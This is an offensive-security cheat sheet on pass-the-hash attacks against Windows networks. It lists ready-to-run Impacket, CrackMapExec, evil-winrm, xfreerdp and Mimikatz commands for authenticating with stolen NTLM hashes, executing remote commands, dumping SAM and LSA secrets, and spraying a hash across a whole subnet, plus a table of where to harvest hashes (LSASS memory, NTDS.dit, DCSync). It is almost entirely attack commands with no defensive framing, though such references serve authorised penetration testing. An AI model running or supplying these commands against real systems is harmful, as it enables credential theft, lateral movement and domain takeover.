Skip to main content

Overview

Use NTLM hash directly for authentication. No need to crack. Works with SMB, WinRM, RDP (restricted admin), WMI, etc.

Impacket

impacket-psexec DOMAIN/user@TARGET -hashes aad3b435b51404eeaad3b435b51404ee:NTLM_HASH
impacket-wmiexec DOMAIN/user@TARGET -hashes :NTLM_HASH
impacket-smbexec DOMAIN/user@TARGET -hashes :NTLM_HASH
impacket-atexec DOMAIN/user@TARGET -hashes :NTLM_HASH "whoami"

CrackMapExec

crackmapexec smb TARGET -u user -H NTLM_HASH
crackmapexec smb TARGET -u user -H NTLM_HASH -x "whoami"
crackmapexec smb TARGET -u user -H NTLM_HASH --sam          # Dump SAM
crackmapexec smb TARGET -u user -H NTLM_HASH --lsa          # Dump LSA
crackmapexec winrm TARGET -u user -H NTLM_HASH

Evil-WinRM

evil-winrm -i TARGET -u user -H NTLM_HASH

xfreerdp (RDP — Restricted Admin)

xfreerdp /v:TARGET /u:user /pth:NTLM_HASH
Requires Restricted Admin mode enabled on target.

Mimikatz (Windows)

sekurlsa::pth /user:administrator /domain:DOMAIN /ntlm:NTLM_HASH /run:cmd.exe

Spray Hash Across Subnet

crackmapexec smb 10.10.10.0/24 -u administrator -H NTLM_HASH

Get the Hash

SourceTool
SAM databasesecretsdump, reg save
LSASS memorymimikatz, procdump
NTDS.ditsecretsdump, ntdsutil
DCSyncsecretsdump -just-dc
Cached credsmimikatz lsadump::cache

Quick Reference

TaskCommand
PsExecimpacket-psexec DOM/user@TARGET -hashes :HASH
WinRMevil-winrm -i TARGET -u user -H HASH
CMEcrackmapexec smb TARGET -u user -H HASH
Mimikatzsekurlsa::pth /user:admin /ntlm:HASH
Spraycrackmapexec smb SUBNET -u admin -H HASH